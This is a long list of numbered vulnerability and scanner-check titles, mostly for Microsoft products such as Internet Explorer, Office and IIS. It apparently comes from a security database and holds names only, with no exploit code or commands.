[35315] Microsoft Internet Explorer history.length information disclosure [35217] Microsoft Excel Workspace designation code execution [35215] Microsoft Excel active worksheet code execution [35213] Microsoft Office Web Components DataSourceControl object code execution [35212] Microsoft Office Web Components Spreadsheet object code execution [35210] Microsoft Excel version code execution [35197] Microsoft Internet Information Services URL parser buffer overflow [35195] Microsoft XML Core Services (MSXML) memory request code execution [35182] Microsoft Virtual PC and Virtual Server guest operating system buffer overflow [35163] Microsoft Internet Explorer file: URI information disclosure [35153] Microsoft Internet Explorer FTP implementation information disclosure [35132] Microsoft Excel sheet name buffer overflow [35118] Nessus Windows GUI cross-site scripting [35064] Microsoft MSN Messenger SIP weak security [34989] Microsoft Internet Explorer resource:// information disclosure [34867] Microsoft Internet Explorer IDN authentication dialog spoofing [34849] Microsoft Office MSODataSourceControl ActiveX control buffer overflow [34755] Microsoft Internet Explorer Outlook Express Address Book object denial of service [34754] Microsoft Internet Explorer MSHtmlPopupWindow object denial of service [34720] Microsoft FrontPage Personal Web Server CERN Image Map Dispatcher buffer overflow [34719] Microsoft FrontPage CERN Image Map Dispatcher information disclosure [34705] Microsoft Internet Explorer location URL spoofing [34696] Microsoft Internet Explorer page update cross-domain security bypass [34650] Microsoft Internet Explorer Javascript src attribute denial of service [34639] Microsoft .NET Framework JIT Compiler service buffer overflow [34638] Microsoft .NET Framework NULL byte termination information disclosure [34637] Microsoft .NET Framework PE Loader service buffer overflow [34632] Microsoft Internet Explorer navigation cancel page spoofing [34630] Microsoft Internet Explorer Speech API ActiveX control code execution [34626] Microsoft Internet Explorer uninitialized object code execution [34621] Microsoft Internet Explorer multiple language packs code execution [34619] Microsoft Internet Explorer CSS tag code execution [34610] Microsoft Visio compressed document packaging code execution [34607] Microsoft Visio version number code execution [34600] Microsoft VDT Database Designer VDT70.DLL ActiveX control buffer overflow [34476] Microsoft Visual Basic Company Name buffer overflow [34475] Microsoft Visual Basic project detail buffer overflow [34473] Microsoft Office 2000 ActiveX control buffer overflow [34434] Microsoft IIS Hit-highlighting security bypass [34418] Microsoft Internet Information Server (IIS) AUX/.aspx denial of service [34343] Microsoft SharePoint Server default.aspx PATH_INFO cross-site scripting [33993] VMware Workstation Windows guest debugging unspecified [33978] Microsoft Internet Explorer LF response splitting [33915] Microsoft Excel autofilter code execution [33914] Microsoft Excel placeholder data code execution [33913] Microsoft Excel BIFF file format buffer overflow [33908] Microsoft Office drawing object code execution [33901] Microsoft Word RTF parsing code execution [33899] Microsoft Word function call code execution [33890] Microsoft Exchange IMAP command denial of service [33889] Microsoft Exchange MIME base64 code execution [33888] Microsoft Exchange iCal MODPROPS denial of service [33887] Microsoft Exchange UTF character set cross-site scripting [33715] Microsoft Internet Explorer unspecified JavaScript denial of service [33713] Microsoft Word 2007 multiple unspecified denial of service [33712] Microsoft Word 2007 wwlib.dll buffer overflow [33673] CA ARCserve Backup for Windows detected [33478] Multiple vendor image viewers for Windows BMP buffer overflow [33447] Microsoft security updates not available for version of Microsoft Data Access Components [33446] Microsoft security updates not available for Microsoft Internet Explorer version [33415] Microsoft Internet Explorer JavaScript DNS pinning code execution [33355] Microsoft Internet Explorer msauth.dll code execution [33317] Microsoft Internet Explorer UTF-7 encoded URL cross-site scripting [33265] Microsoft Agent ActiveX control Character.Load() code execution [33256] Microsoft Internet Explorer HTML object freed memory code execution variant [33255] Microsoft Internet Explorer HTML object freed memory code execution [33254] Microsoft Internet Explorer CSS text style code execution [33253] Microsoft Internet Explorer HTML object uninitialized array member code execution [33252] Microsoft Internet Explorer chtskdic.dll COM object code execution [33041] Microsoft Excel XML and XLS file denial of service [33039] Microsoft Office WMF file denial of service [32939] Microsoft Internet Explorer resizeTo denial of service [32907] Microsoft Xbox 360 hypervisor code execution [32906] Microsoft Xbox 360 hypervisor security bypass [32831] Microsoft Internet Explorer BrowseDialog ActiveX control denial of service [32769] Microsoft Publisher .pub file memory validation code execution [32754] Citrix Presentation Server Client for Windows ICA code execution [32739] Microsoft Capicom Certificates ActiveX control code execution [32737] Microsoft Content Management Server (MCMS) HTTP request cross-site scripting [32736] Microsoft Content Management Server (MCMS) HTTP GET code execution [32649] Microsoft Internet Explorer onUnload handler URL spoofing [32647] Microsoft Internet Explorer onUnload handler denial of service [32631] Microsoft SQL Server 2000 Service Pack 2 update is not installed [32503] Microsoft Word document malformed string code execution [32457] Microsoft Internet Explorer getElementById denial of service [32454] Microsoft Visual Studio time functions denial of service [32427] Microsoft Internet Explorer COM ActiveX object code execution [32404] Microsoft Knowledge Base Article 905495 is not installed [32403] Microsoft Knowledge Base Article 905414 is not installed [32178] Microsoft Office Excel malformed record code execution [32106] Microsoft Internet Explorer COM object code execution [32100] Microsoft Internet Explorer FTP response code execution [32097] Microsoft Word drawing object code execution [32096] Microsoft Word macro code execution [32095] Microsoft Internet Explorer COM object code execution [32089] Microsoft Fronpage Extensions directory /_vti_log/ present [32078] Microsoft Fronpage Extensions directory /_vti_bin/ present [32076] Microsoft Frontpage Extensions directory /_vti_pvt/ present [32074] Microsoft IIS iissamples directory present [32020] Fullaspsite Asp Hosting Sitesi windows.asp SQL injection [31914] Telestream Flip4Mac Windows Media Components for QuickTime WMV file code execution [31867] Microsoft Internet Explorer ActiveX multiple properties denial of service [31840] Microsoft Exchange Server detected [31834] Microsoft Word document function code execution [31814] Microsoft Internet Explorer IFRAME file URI denial of service [31675] Microsoft Internet Explorer BrowseDialog ActiveX control denial of service [31665] Microsoft Visual Studio .rc file buffer overflow [31644] Microsoft IIS Web server access.cnf file detected [31643] Microsoft HTML Help Workshop .HPJ files buffer overflow [31642] Microsoft IIS Web server service.cnf file detected [31638] Microsoft IIS Web server svcacl.cnf file detected [31630] Microsoft Internet Information Services IISAdmin directory detected [31555] Microsoft HTML Help Workshop .CNT files buffer overflow [31549] Microsoft Internet Explorer CCRP Folder Treeview ActiveX control denial of service [31358] Microsoft XML Core Services IFRAME code execution [31287] Microsoft Internet Explorer VML record buffer overflow [31284] Adobe Acrobat detected on Windows system [31208] Microsoft Excel Palette record buffer overflow [31207] Microsoft Excel column record buffer overflow [31206] Microsoft Excel string buffer overflow [31205] Microsoft Excel malformed record buffer overflow [31204] Microsoft Excel IMDATA record buffer overflow [31196] Microsoft Office 2003 Brazilian Grammar Checker buffer overflow [31188] Microsoft Outlook Finder.exe .oss file buffer overflow [31187] Microsoft Outlook email long header denial of service [31186] Microsoft Outlook .iCal meeting request VEVENT buffer overflow [31127] Microsoft Antivirus engine pdf buffer overflow [31011] Microsoft Internet Information Services IUSR_Machine command execution [30959] Microsoft Outlook ole32.dll ActiveX denial of service [30905] Microsoft Project Server 2003 pdsrequest.asp information disclosure [30885] Microsoft Word pointer code execution [30806] Microsoft Word data structure code execution [30738] Microsoft Word data string code execution [30712] Novell Client for Windows SRVLOC.SYS component denial of service [30609] Microsoft OLE Dialog component code execution [30603] Microsoft Internet Explorer TIF folder OBJECT tag information disclosure [30602] Microsoft Internet Explorer TIF folder drag and drop information disclosure [30601] Microsoft Internet Explorer DHTML script code execution [30600] Microsoft Internet Explorer script error handling code execution [30596] Microsoft Step-by-Step Interactive Training bookmark link buffer overflow [30220] Microsoft Internet Explorer Phishing Filter active [30168] Microsoft Internet Explorer ieframe.dll certificate spoofing [30004] Microsoft XMLHTTP ActiveX control code execution [29945] Microsoft Agent .ACF file buffer overflow [29915] Microsoft Visual Studio WmiScriptUtils.dll code execution [29860] Microsoft .NET Framework request filtering insecure [29837] Microsoft Internet Explorer ADODB.Connection code execution [29827] Microsoft Internet Explorer Popup Address bar spoofing [29750] Microsoft Active Directory unauthorized login attempt rejected [29749] Microsoft Active Directory security audit setup failed [29748] Microsoft Active Directory security attributes changed [29747] Microsoft Active Directory Security Descriptor Propagator terminated [29746] Microsoft Active Directory addition of replication link success [29745] Microsoft Active Directory addition of replication link failed [29744] Microsoft Active Directory replication connection created [29742] Microsoft Active Directory object operation performed [29741] Microsoft Active Directory outbound replication disabled [29740] Microsoft Active Directory host not global catalog server [29737] Microsoft Active Directory maximum LDAP connections reached [29736] Microsoft Active Directory inbound replication disabled [29735] Microsoft Active Directory calculate security descriptor failed [29733] Microsoft Active Directory write security descriptor failed [29731] Microsoft Active Directory object operation failed [29730] Microsoft Active Directory right grant attempt failed [29729] Microsoft Active Directory domain controller removal failed [29728] Microsoft Active Directory SID inherit attempt failed [29726] Microsoft Active Directory domain removed from enterprise [29725] Microsoft Active Directory database initialization failure [29724] Microsoft Active Directory certificate rejected, not trusted [29722] Microsoft Active Directory certificate replication access rejected [29713] Microsoft Internet Information Server MS01-026 patch is not installed [29680] Microsoft Internet Information Server MS01-044 patch is not installed [29670] Microsoft Internet Explorer 7 is installed [29507] Microsoft Office 2003 unspecified PowerPoint NULL pointer dereference denial of service [29462] ISA Server Windows Out-Of-Band attack detected [29242] Microsoft Excel COLINFO code execution [29239] Microsoft Excel Lotus 1-2-3 file buffer overflow [29238] Microsoft Excel DATETIME buffer overflow [29234] Microsoft PowerPoint bit record code execution [29233] Microsoft PowerPoint data record code execution [29232] Microsoft PowerPoint object pointer code execution [29225] Microsoft PowerPoint unspecified .ppt file code execution [29224] Microsoft Word mail merge file code execution [29216] Microsoft Office Smart Tag code execution [29215] Microsoft Word malformed string code execution [29213] Microsoft Office malformed record code execution [29212] Microsoft Office malformed chart record code execution [29210] Microsoft XML Core Services XLST buffer overflow [29209] Microsoft Office malformed string code execution [29206] Microsoft XML Core Services XMLHTTP information disclosure [29199] Microsoft Internet Explorer layout combinations code execution [29135] Microsoft Internet Explorer CSS HTML INPUT DIV element denial of service [29092] Microsoft Visual Basic msgbox unspecified [29004] Microsoft Internet Explorer VML buffer overflow [28942] Microsoft Internet Explorer DirectAnimation keyframe buffer overflow [28893] Microsoft Internet Explorer HTTP 1.1 compression long URL buffer overflow variant [28775] Microsoft Word unspecified memory corruption code execution [28658] Microsoft ASP.NET Framework HTTP cross-site scripting [28651] Microsoft Indexing Service cross-site scripting [28650] Microsoft Office PICT image filter code execution [28648] Microsoft Publisher .pub file malformed string code execution [28647] Microsoft Office EPS filter code execution [28608] Microsoft Internet Explorer daxctle.ocx denial of service [28559] Proventia Server for Windows is installed [28532] AK-Systems Windows Terminal unauthorized VNC access [28522] Microsoft Internet Explorer HTTP 1.1 compression long URL buffer overflow [28516] Microsoft Internet Explorer multiple COM object color property denial of service [28511] Microsoft Internet Explorer multiple Visual Studio COM object denial of service [28444] Microsoft Internet Explorer tsuserex.dll COM object denial of service [28439] Microsoft Internet Explorer msoe.dll COM object denial of service [28438] Microsoft Internet Explorer chtskdic.dll COM object denial of service [28436] Microsoft Internet Explorer imskdic.dll COM object denial of service [28336] Symantec VERITAS Backup Exec for Windows Server RPC interface buffer overflow [28068] Microsoft Internet Explorer deleted frame access denial of service [28066] Microsoft Internet Explorer ADODB.Recordset ActiveX object denial of service [28046] Microsoft Internet Explorer NDFXArtEffects ActiveX object denial of service [28043] Microsoft Internet Explorer HTML rendering code execution [28042] Microsoft Internet Explorer Window location information disclosure [28040] Microsoft Internet Explorer cross-domain code execution [28039] Microsoft Internet Explorer ActiveX COM object code execution [28037] Microsoft Internet Explorer chained CSS code execution [28034] Microsoft Internet Explorer HTML layout code execution [28025] Microsoft PowerPoint BIFF file format malformed record code execution [28023] Microsoft Visual Basic for Applications (VBA) document property buffer overflow [27932] Microsoft Internet Explorer native function iteration denial of service [27931] Microsoft Internet Explorer Forms.ListBox.1 and Forms.ComboBox.1 ActiveX object denial of service [27930] Microsoft Internet Explorer ASFSourceMediaDescription ActiveX object denial of service [27929] Microsoft Internet Explorer Internet.HHCtrl ActiveX object denial of service [27900] Microsoft Internet Explorer wininet.dll denial of service [27890] Microsoft Internet Explorer href title denial of service [27884] Microsoft Internet Explorer CEnroll ActiveX object denial of service [27854] Microsoft IIS ASP cache virtual server information disclosure [27845] Microsoft Internet Explorer OVCtl ActiveX object denial of service [27833] Microsoft ISA file extension security bypass [27804] Microsoft Internet Explorer WebViewFolderIcon ActiveX object code execution [27803] Microsoft Internet Explorer DataSourceControl ActiveX object denial of service [27795] Microsoft Works wksss.exe denial of service [27794] Microsoft Works wksss.exe buffer overflow [27783] Microsoft PowerPoint powerpnt.exe unspecified vulnerability [27782] Microsoft PowerPoint unspecified memory corruption [27781] Microsoft PowerPoint unspecified mso.dll code execution [27762] Microsoft Internet Explorer DXImageTransform.Microsoft.Gradient ActiveX object denial of service [27761] Microsoft Internet Explorer MHTMLFile ActiveX object denial of service [27760] Microsoft Internet Explorer FolderItem control denial of service [27740] Microsoft PowerPoint mso.dll malformed shape code execution [27713] Microsoft Internet Explorer RevealTrans ActiveX object denial of service [27675] Microsoft Internet Explorer TriEditDocument ActiveX object denial of service [27653] Microsoft Excel Asian language editions Style and Repair buffer overflow [27649] Microsoft Internet Explorer HtmlDlgSafeHelper ActiveX object denial of service [27626] Microsoft Word hlink.dll buffer overflow [27623] Microsoft Internet Explorer Object.Microsoft.DXTFilter ActiveX object denial of service [27622] Microsoft Internet Explorer DirectAnimation.DAUserData ActiveX object denial of service [27621] Microsoft Internet Explorer RDS.DataControl ActiveX object denial of service [27617] Microsoft Office mso.dll LsCreateLine() denial of service [27609] Microsoft Office property field buffer overflow [27607] Microsoft Office string parsing buffer overflow [27604] Microsoft Excel cell rebuilding code execution [27599] Microsoft Internet Explorer OutlookExpress.AddressBook ActiveX object denial of service [27596] Microsoft Internet Explorer ADODB.Recordset ActiveX object denial of service [27592] Microsoft Internet Explorer table.frameset appendChild() denial of service [27573] Microsoft Internet Explorer HTML Help HHCtrl ActiveX control buffer overflow [27565] Microsoft Internet Explorer StructuredGraphicsControl SourceURL denial of service [27558] Microsoft Office PNG buffer overflow [27556] Microsoft Office GIF filter buffer overflow [27550] Novell GroupWise Windows Client API unauthorized email access [27544] Microsoft Office Excel SELECTION buffer overflow [27542] Microsoft Office and Microsoft Works Suite Excel SELECTION buffer overflow [27466] Microsoft Office and Microsoft Works Suite Excel LABEL buffer overflow [27464] Microsoft Office Excel FNGROUPCOUNT buffer overflow [27463] Microsoft Office Excel OBJECT buffer overflow [27456] Microsoft Internet Explorer HTA SMB file share command execution [27452] Microsoft Internet Explorer object.documentElement.outer information disclosure [27450] Microsoft Office Suite Excel COLINFO buffer overflow [27312] Microsoft Excel embedded Shockwave Flash Object code execution [27288] Microsoft Internet Explorer ASCII encoded Web filter bypass [27224] Microsoft Office hlink.dll COM object buffer overflow [27179] Microsoft Excel unspecified code execution [26971] Microsoft NetMeeting unspecified memory corruption denial of service [26817] Microsoft Internet Explorer CSS position denial of service [26810] Microsoft Internet Explorer mhtml://mid URL buffer overflow [26808] Microsoft Internet Explorer HTML tag parsing denial of service [26802] Microsoft ASP.NET Framework App_Code folder information disclosure [26796] Microsoft Internet Information Services (IIS) ASP buffer overflow [26784] Microsoft Powerpoint record buffer overflow [26782] Microsoft Internet Explorer .mht files code execution [26777] Microsoft Internet Explorer Address bar spoofing [26774] Microsoft Internet Explorer DXImageTransform.Microsoft.MMSpecialEffect1Input ActiveX object code execution [26768] Microsoft Internet Explorer DXImageTransform.Microsoft.Light ActiveX control code execution [26766] Microsoft Internet Explorer UTF8 encoded HTML code execution [26762] Microsoft Internet Explorer nested OBJECT tag memory corruption variant [26632] Cisco VPN Client for Windows GUI privilege escalation [26556] Microsoft Word document handling buffer overflow [26340] Microsoft Infotech Storage System Library (itss.dll) CHM file heap corruption [26281] Microsoft Internet Explorer mhtml: URL redirection information disclosure [26233] Microsoft ISA Server log file manipulation [26118] Microsoft Office 2003 mailto: information disclosure [26111] Microsoft Internet Explorer modal security dialog box code execution [26027] Ethereal NetXray/Windows Sniffer buffer overflow [25978] Microsoft Internet Explorer nested OBJECT tag memory corruption [25939] HP StorageWorks Secure Path for Windows denial of service [25852] Microsoft Internet Explorer CSS scrollbar denial of service [25844] Microsoft Dynamics GP magic number denial of service [25843] Microsoft Dynamics GP DPS multiple buffer overflows [25842] Microsoft Dynamics GP DPM multiple buffer overflows [25841] Microsoft Dynamics GP DPS and DPM IP address buffer overflow [25840] Microsoft Dynamics GP DPS and DPM string buffer overflow [25818] Multiple Mozilla products windows.controllers array cross-site scripting [25678] Microsoft Office document string buffer overflow [25634] Microsoft Internet Explorer .swf address bar spoofing [25557] Microsoft Internet Explorer address bar spoofing [25556] Microsoft Exchange calendar attachment buffer overflow [25555] Microsoft Internet Explorer navigation method popup security zone bypass [25552] Microsoft Internet Explorer IOIeClientSite code execution [25551] Microsoft Internet Explorer Double-Byte Character Set code execution [25550] Microsoft Exchange Outlook Web Access cross-site scripting [25547] Microsoft Internet Explorer HTML PRE tag code execution [25545] Microsoft Internet Explorer COM objects as ActiveX code execution [25542] Microsoft Internet Explorer HTML parsing code execution [25537] Microsoft FrontPage Server Extensions HTML cross-site scripting [25439] Microsoft .NET ILDASM buffer overflow [25438] Microsoft .NET ILASM buffer overflow [25394] Microsoft Internet Explorer HTA file execution [25392] Microsoft ASP.NET COM and COM+ w3wp.exe denial of service [25379] Microsoft Internet Explorer createTextRange() code execution [25330] Microsoft Commerce Server 2002 authfiles/login.asp authentication bypass [25292] Microsoft Internet Exporer mshtml.dll buffer overflow [25284] Microsoft Internet Explorer HTML CSS null dereference denial of service [25256] Microsoft Internet Explorer Java VM denial of service [25229] Microsoft Excel graphic buffer overflow [25228] Microsoft Excel record buffer overflow [25227] Microsoft Excel formula size buffer overflow [25225] Microsoft Excel parsing format file buffer overflow [25148] Microsoft Visual Studio and Visual InterDev .dbp and .sln DataProject buffer overflow [25011] Microsoft Internet Explorer display adapter JPEG image denial of service [25009] Microsoft Office routing slip metadata buffer overflow [24923] Microsoft Internet Explorer IsComponentInstalled() buffer overflow [24846] Microsoft Internet Explorer window.status memory leak denial of service [24844] Microsoft .asf file detected [24788] Microsoft Internet Explorer Script Engine stack denial of service [24648] Microsoft Internet Explorer drag and drop event file downloading variant [24629] BlackBerry Enterprise Server Attachment Service Microsoft Word file buffer overflow [24490] Microsoft PowerPoint TIFF information disclosure [24487] Microsoft Internet Explorer WMF image code execution [24481] Microsoft HTML Help Workshop .hhp file buffer overflow [24379] Microsoft Internet Explorer ActiveX kill bit settings can be bypassed [24346] Microsoft Office \BaseNamedObjects\Mso97SharedDg denial of service [24188] Microsoft Visual Studio project.dsp code execution [24162] Microsoft Internet Explorer invalid IMG and XML element denial of service [24116] Microsoft Visual Studio UserControl.Load code execution [24089] Avira Desktop for Windows ACE filename buffer overflow [24061] Symantec Norton SystemWorks NProtect directory is hidden from Windows APIs [23895] Microsoft Internet Explorer HTML denial of service [23706] Microsoft MSN Messenger and Internet Explorer image denial of service [23571] Microsoft Internet Explorer cssText information disclosure [23537] Microsoft Excel msvcrt.memmove() buffer overflow [23451] Microsoft Internet Explorer HTTPS proxy authentication information disclosure [23448] Microsoft Internet Explorer download dialog box code execution [23129] Microsoft Outlook Express news server information disclosure [22878] Microsoft Exchange Server and Outlook TNEF overflow [22852] Microsoft Internet Explorer mshtmled.dll denial of service [22474] Microsoft Internet Explorer colon data manipulation [22472] Microsoft Internet Explorer ActiveX HTTP request injection [22413] Microsoft Internet Explorer for Mac OS about: buffer overflow [22379] Microsoft Internet Explorer Web content controlled cross-site scripting [22338] Microsoft Internet Information Server WebDAV request source code disclosure [22318] Microsoft SQL Server 2000 Service Pack 4 update is not installed [22268] Microsoft Log Sink Class ActiveX pkmcore.dll file manipulation [22183] Microsoft Exchange Server 2003 public folder denial of service [22155] Microsoft Knowledge Base Article 896688 is not installed [22073] Microsoft Knowledge Base Article 903235 is not installed [22072] Microsoft Knowledge Base Article 899587 is not installed [22071] Microsoft Knowledge Base Article 896428 is not installed [22069] Microsoft Knowledge Base Article 890859 is not installed [22068] Microsoft Knowledge Base Article 890046 is not installed [22042] Microsoft Internet Explorer command execution [21955] Microsoft Internet Information Server SERVER_NAME request spoofing [21930] Microsoft Internet Explorer URL restricted zone denial of service [21702] Microsoft Internet Explorer Web Folder Behaviors zone bypass [21701] Microsoft Internet Explorer JPEG image buffer overflow [21660] Microsoft ActiveSync brute force allows attacker to guess equipment IDs [21658] Microsoft ActiveSync multiple request denial of service [21553] Microsoft Internet Explorer AJAX denial of service [21537] Microsoft FrontPage style tag denial of service [21455] MSN (Microsoft Network) Messenger .pif denial of service [21352] Microsoft ASP.NET RCP/encoded denial of service [21315] Microsoft Outlook 2002 connector for Domino bypass restrictions [21307] Microsoft Internet Explorer multiple COM object code execution [21271] Microsoft Word font buffer overflow [21193] Microsoft Internet Explorer javaprxy.dll buffer overflow [21100] Microsoft Internet Explorer popup obtain information [21071] Microsoft Internet Explorer BMP memory denial of service [21025] Microsoft ISA Server SecureNAT client configuration denial of service [20975] Microsoft Internet Explorer allows script code modification [20967] Microsoft Exchange Outlook Web Access cross-site scripting [20843] Microsoft ISA Server Netbios bypass policy [20842] Microsoft ISA Server HTTP header cache poisoning [20831] Microsoft Agent character spoof [20830] Microsoft Outlook Express NNTP Response Parsing buffer overflow [20693] Microsoft ASP.NET Framework SQL injection [20692] Microsoft ASP.NET Framework full path disclosure [20683] Microsoft Word .mcw file buffer overflow [20617] Microsoft Internet Explorer information bar security bypass [20409] Microsoft ASP.NET Framework ViewState replay [20408] Microsoft ASP.NET Framework _VIEWSTATE denial of service [20080] Oracle Forms Query/Where Windows popup SQL injection [20026] Microsoft Outlook and Outlook Web Access email client address spoofing [19950] MSN (Microsoft Network) Messenger GIF image code execution [19914] Microsoft Jet Database msjet40.dll library buffer overflow [19875] Microsoft Knowledge Base Article 893066 is not installed [19842] Microsoft Internet Explorer Content Advisor buffer overflow [19841] Microsoft Internet Explorer URL buffer overflow [19831] Microsoft Internet Explorer DHTML object buffer overflow [19828] Microsoft Word document buffer overflow [19716] Microsoft Office InfoPath form information disclosure [19629] Microsoft Exchange Server 2003 folder denial of service [19461] Microsoft Office applications information disclosure [19452] Microsoft Internet Explorer title bar spoofing [19373] Microsoft Internet Explorer and Outlook Express status bar spoofing [19252] Microsoft Knowledge Base Article 890261 is not installed [19225] Microsoft Outlook Web Access owalogon.asp script URL redirect [19214] Microsoft Internet Explorer file URL encode [19141] Microsoft Knowledge Base Article 867282 is not installed [19137] Microsoft Internet Explorer Channel Definition Format code execution [19133] Microsoft DHTML method buffer overflow [19121] Microsoft Pocket Internet Explorer (PIE) URL Unicode spoofing [19118] Microsoft Knowledge Base Article 890047 is not installed [19117] Microsoft Internet Explorer drag and drop event file downloading [19116] Microsoft Knowledge Base Article 891781 is not installed [19112] Microsoft Knowledge Base Article 873352 is not installed [19111] Microsoft Knowledge Base Article 888113 is not installed [19107] Microsoft Office XP URL buffer overflow [19106] Microsoft Knowledge Base Article 873333 is not installed [19102] Microsoft Knowledge Base Article 885834 is not installed [19095] Microsoft Knowledge Base Article 888302 is not installed [19092] Microsoft Knowledge Base Article 887981 is not installed [19090] Microsoft Knowledge Base Article 885250 is not installed [18944] Microsoft Knowledge Base Article 886185 is not installed [18936] Microsoft Internet Explorer file exisitence [18897] Microsoft Internet Explorer bypass file download warning [18770] Microsoft Knowledge Base Article 890175 is not installed [18769] Microsoft Knowledge Base Article 887219 is not installed [18723] Microsoft Internet Explorer FTP arbitrary file creation [18504] Microsoft Internet Explorer DHTML bypass cross-domain security model [18489] Cisco Unity integrated with Microsoft Exchange has default user accounts [18444] Microsoft Internet Explorer could allow an attaker to bypass popup blocking [18442] Microsoft SharePoint Portal Server could allow an attacker to obtain password [18395] Microsoft Internet Explorer sysimage obtain information [18389] Microsoft Exchange Server SMTP buffer overflow [18388] Microsoft Exchange Server SMTP integer overflow [18311] Microsoft Internet Explorer save file caused by the Related Topics command of the Help ActiveX Control [18269] Microsoft Internet Explorer Save Picture As spoofing [18189] Altiris Deployment Agent for Windows allows elevated privileges [18181] Microsoft Internet Explorer execCommand bypass download warnings [18073] Microsoft Internet Explorer path cookie overwrite [18020] Microsoft Internet Explorer status bar spoofing [17989] Microsoft Internet Explorer open window allows attacker to obtain information [17938] Microsoft Internet Explorer A HREF status bar spoofing [17936] Cisco Secure ACS for Windows and Solution Engine EAP-TLS bypass authentication [17931] Microsoft Internet Explorer mshtml.dll denial of service [17911] Microsoft Internet Explorer FONT tags denial of service [17910] Microsoft Internet Explorer Hhctrl.ocx allows cross-domain script injection [17909] Microsoft Internet Explorer table status bar spoofing [17907] Microsoft ISA Server and Proxy Server Patch MS04-039 is not installed [17906] Microsoft ISA Server and Proxy Server allow Web site spoofing caused by cache reverse lookup results [17889] Microsoft Internet Explorer IFRAME SRC NAME buffer overflow [17868] Microsoft Remote Desktop Tsshutdn command restart [17828] Microsoft Outlook base64 image file bypass security [17826] Microsoft Outlook 2003 CID security bypass [17824] Microsoft Internet Explorer AnchorClick command execution [17820] Microsoft Internet Explorer bypass Drag and Drop or copy and paste files security setting [17746] Microsoft Internet Explorer URL address spoofing [17739] Microsoft FrontPage and Internet Explorer asycpict.dll JPEG denial of service [17683] Microsoft Excel MS04-033 patch is not installed [17656] Microsoft Internet Information Server MS04-030 patch is not installed [17655] Microsoft Internet Explorer plug-in navigation allows address bar spoofing [17654] Microsoft Internet Explorer cache from SSL Web sites obtain information [17653] Microsoft Excel allows code execution [17652] Microsoft Internet Explorer Double Byte Character Set spoof Web site to obtain information [17651] Microsoft Internet Explorer MS04-038 patch is not installed [17650] Microsoft Internet Explorer allows unauthorized access to XML documents [17645] Microsoft Internet Information Server WebDAV multiple attributes per XML elements cause denial of service [17644] Microsoft ASP.NET Framework bypass security [17635] Microsoft Word improper file parsing buffer overflow [17620] Microsoft Internet Explorer InstallEngineCtl SetCifFile buffer overflow [17542] Microsoft SQL Server data buffer denial of service [17479] Windows Mite backdoor [17408] MyWaySpeedBar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [17407] DealHelper attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [17402] zSearch attaches to processes of Microsoft Internet Explorer [17395] AdButler spyware attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [17340] Microsoft Word Perfect MS04-027 patch is not installed [17306] Microsoft WordPerfect converter long message buffer overflow [17153] Microsoft System Information (Msinfo32.exe) msinfo_file buffer overflow [17118] Cisco Secure ACS Windows and Solution Engine CSAdmin bypass authentication [17116] Cisco Secure ACS Windows and Solution Engine LEAP RADIUS denial of service [17115] Cisco Secure ACS Windows and Solution Engine CSAdmin HTTP denial of service [17114] Cisco Secure ACS Windows and Solution Engine CSAdmin TCP denial of service [17102] Microsoft Internet Explorer IFRAME information disclosure [17098] Microsoft Outlook Express address information disclosure [17048] Microsoft ISA Server FTP bounce attack [17044] Microsoft Internet Explorer dragDrop allows code execution [17007] Microsoft Internet Explorer address bar spoofing [16872] Microsoft Internet Information Server (IIS) ActivePerl command execution [16857] Microsoft Internet Explorer STYLE tag comment buffer overflow [16805] Microsoft Internet Explorer MS04-025 patch is not installed [16804] Microsoft Internet Explorer MSHTML.DLL GIF file buffer overflow [16709] Microsoft Internet Explorer JavaScript denial of service [16708] Microsoft Outlook Express code execution [16707] Suspicious or malicious windows registry keys and values exist [16696] Microsoft Systems Management Server (SMS) Remote Control Client service denial of service [16692] PHP HTML tags may bypass strip_tag function in Microsoft Internet Explorer and Safari [16681] Microsoft Internet Explorer function redirect cross-site scripting [16678] Microsoft Internet Explorer text file denial of service [16675] Microsoft Internet Explorer popup.show allows attacker to perform actions [16666] Microsoft Java Virtual Machine sandbox restriction bypass [16663] Microsoft Word and Outlook Object tag allows unauthorized access [16656] Microsoft Internet Information Server (IIS) MS04-021 patch is not installed [16648] Microsoft Internet Explorer Shell.Application [16624] Microsoft Internet Explorer ADODB.Stream object is not disabled [16585] Microsoft Outlook Express malformed email header denial of service [16583] Microsoft Exchange Server OWA could allow remote execution of code [16578] Microsoft Internet Information Server (IIS) redirect buffer overflow [16448] Microsoft MN-500 Web administration denial of service [16443] Microsoft Internet Explorer Wildcard DNS entry cross-site scripting [16420] Microsoft Internet Explorer null pointer denial of service [16398] Microsoft Internet Explorer bypass security zone restrictions [16394] Microsoft Internet Explorer ADODB.Stream object code execution [16384] Microsoft ISA Server Web Proxy redirect denial of service [16383] Microsoft ISA Server Basic authentication credentials sent in plain text [16382] Microsoft ISA Server canonicalization error in Rules engine [16380] Microsoft ISA Server Web Proxy SSL denial of service [16361] Microsoft Internet Explorer bypass cross-zone restrictions [16348] Microsoft Internet Explorer Location: header bypass restrictions [16306] Microsoft DirectX DirectPlay denial of service [16205] Microsoft SQL Server buffer overflow exploit attempt detected [16202] Microsoft Internet Explorer buffer overflow exploit attempt detected [16201] Microsoft Internet Information Services buffer overflow exploit attempt detected [16200] Microsoft Exchange Server buffer overflow exploit attempt detected [16189] Microsoft Internet Explorer CSS denial of service [16181] Microsoft Visual Basic Command1_Click buffer overflow [16173] Microsoft Outlook 2003 OLE object bypass restricted security zone [16168] Microsoft Outlook Express SMTP usernames and passwords disclosure [16161] Microsoft Internet Explorer browser URL spoofing [16160] Microsoft Internet Explorer MSHTM.DLL http-equiv META tag denial of service [16147] Microsoft Internet Explorer showHelp CHM file execution [16119] Microsoft Outlook 2000 URL spoofing [16116] Microsoft Outlook VML information disclosure [16104] Microsoft Outlook 2003 predictable file location could allow code execution [16102] Microsoft Internet Explorer and Outlook Express A HREF URL spoofing [16091] Microsoft Internet Explorer file URL could allow an attacker to overwrite registry [16061] Microsoft Internet Explorer SSL certificate spoofing [16058] Microsoft Internet Information Server ASP information disclosure [15906] Microsoft Visual Studio .NET unknown Debugger configuration issue [15859] Microsoft Outlook email ASCII NUL denial of service [15853] Microsoft Internet Explorer OLE object unauthorized print job [15832] Microsoft Internet Explorer IFRAME denial of service [15809] Microsoft Outlook Express MS04-013 patch is not installed [15729] Microsoft SharePoint Portal Server cross-site scripting [15705] Microsoft Outlook Express MHTML URL allows execution of 